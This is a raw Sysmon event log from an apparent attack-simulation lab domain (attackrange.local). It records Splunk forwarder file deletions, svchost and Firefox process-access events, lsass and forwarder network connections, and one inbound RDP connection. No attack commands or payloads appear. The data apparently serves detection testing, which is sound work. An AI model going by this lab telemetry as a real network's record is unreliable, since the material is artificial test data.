07:46:58.076{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf64733f.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:59.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FAED2CB62FC8EC810C8D3003C0BC88D,SHA256=13EA716D6620E843728283062F9A7BB8766CA8578C1EA9C52156A8DFBB9CDC46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:59.543{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:59.175{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70359B6DD03CBB5FA774F2D1E15F213B,SHA256=1619EAA9087006614CF2CD46128EB2ECD420F487263C38ABA283C19C4745DE78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:00.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E65B409B051CB22BCD618CA38C3CA61,SHA256=AD89AA12821947020D33CC7EB4F39A38B41BCA83F4001C9088A04AD68E8CD347,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.810{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.810{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.810{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001046840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50948-false10.0.1.12-8000- 10341000x80000000000000001046839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001046837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001046836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001046835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf647d23.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399314D991F05FB1B827A27F74A0BE4F,SHA256=BD71B561C0DA08668DD008C6A5ACBD93D6ACB5EEF98250FB73A99FC6072D13C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:01.211{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3C3439290184966746149279626855,SHA256=94CC9765F559EC3599EC1600A6119F342CC56765A6771259E0199F6EA5F24DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:01.616{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B866BC360A4ED0A1D8D038B494C07FA,SHA256=D5BF916643D7ACE66EC508201C0090799B09099548C4C93B23DCE94B591E460B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:59.264{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57195-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:02.632{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5275CBDCB611B8BBE4356C0B35E1B055,SHA256=07EA26C972E2721C0E13F9434E67A2287B1E14636E9B428512D37A947B43C1F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:02.241{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7DEBFE8626C60A06EBDB25B4F350AEC,SHA256=6E62DEA3E04B1ADCAB14D22F47320AC9F2EDE93025BF0D9677F856128956DEEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:03.647{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FE2143FC83BE1BEAEC85759A2FB5CCB,SHA256=5AD29995B45FFEF525902404925DEEF3AF493A9000A9D87C8E82C5AC84FA63B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.388{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A7E11DD2BF8857D10640D35EDE05F080,SHA256=A41BA48859F4C797F5925318F7B655AB0BEEE47BB432F7CD9E3960DBB7440F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program 
Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1BBCA2FB9FE5CC731E722985237F7981,SHA256=3ABCD4F8D8033D065DD7330F43D51A40ABF5D653970A2D47A1E6FA9B0264475F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0BB6F4B23D2FF601684632A87408A9B7,SHA256=96D78E4B5F87E1F7908F32E1673FEAEE9E9AFA8FA54A09F55454730C8EEB5CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C283BFE7BF8DD93472D2A2221EC7E9E1,SHA256=85F87BA59304BB304A730AA7127495A516337A55DBAA4C3AD6AF60E6B3B674DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=129BD090D60E4D60307A70D940205DA4,SHA256=D31FD3F3E5D0B93FE2EF97B3F5FF91126D993D2E48E3C8C7EB74364073411AC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BB47C7B8624CC7FF0B9EF6676666F74F,SHA256=2885401BBEC53D8ABDD5AB7D6C271E63518C0216A77C4D7645FE6A474453CDB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6F7EEB420E7A3274E4BAD443920FF1C5,SHA256=5D3FA61AB26A95FA35B85CC4B71EE28E9C9DF79EFF677AB1DDD30C677F1D37B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9C951DF6799D3E39D1AA976B1420E688,SHA256=118916E5C5FF4F1D18148062D44B0E786498C799E3AE66F8C4B708F7DD94135B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4528D20BCCF97C48894B441DB9F424B6,SHA256=0E3608E267747D0E19ABD5BC7B00AA8E05B331007DFF6719FC890330ECF3DB22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C944602E191F82C508A5B7A4C3FAC2EA,SHA256=FB123CBC0E0EA8CB7B77AF5E0EC328EB7A4EA6452D5C31CBB6F4BD9F438ED795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.371{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1ABD9D1C4BBE908F33D3F78C190FA517,SHA256=504C1E1959470832D0F73C2C2D2FFF155B9CCB0D238A5A91E8CA289B47734E12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:03.271{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6CFA6203F375BBAAACC497F684C72E,SHA256=C6EF05EDBE9178CCFBFD2E644759A22DACAF95C275FD3B32B6D36BFDF05CF852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:04.694{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E192B1CE3BF6CF02D3AF07B9C1E24E,SHA256=236960611596B32E5CC96310BE963ABB3A3DC2E125B79327B3D7240DDD4EA0F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:56.768{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57196-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001046858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:04.291{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793AC9214010798D082123BA4C4AE0EA,SHA256=D9BC6D717B56D783C7F93793E6D9636D8C1475B9F4BF60294117C7EE02F5C2B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:02.817{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om57862-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:04.226{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B836257E21137688BD27A984F660CDB6,SHA256=DE2774570DEDF8BB1678F5D94095D5B8C6F7F40EBB5B08F45299C140C51DEA1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:04.226{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D6CB7CC0F8FF4A10F2F14DEA4FB8D59,SHA256=68CD63AF5007E851768DEF794E1A9B428C79C0C29A1D1C6A424D41D2783E997F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:05.741{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24180F04894F221F0EFA6A8651782C75,SHA256=67EE532C085248BE969BF8A25AE7EF427B9E7B9CE48424B43493C5E97F603CEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:05.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2731F66762E4AC433EF4190F37E7C165,SHA256=9AB4F335A1F029E91EBF6F7AB8905CF0BD4BCC0DB9A2A3B17189186BC678A536,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:03.367{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57196-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:06.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E54FD185293546B837E8FAF2B34D34,SHA256=FFA4204C0914EAA3A7A54E1D3C1C1C7B43A12E7F5657D2014228E533A6C6A613,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:58.659{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50949-false10.0.1.12-8000- 23542300x80000000000000001046866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A82C1FF32060A3619A789E723DDCFA,SHA256=9587822555933406A32679E9B9C2381AB317B87D2F46274D403B8720F689EF4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:05.249{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57197-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:06.190{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
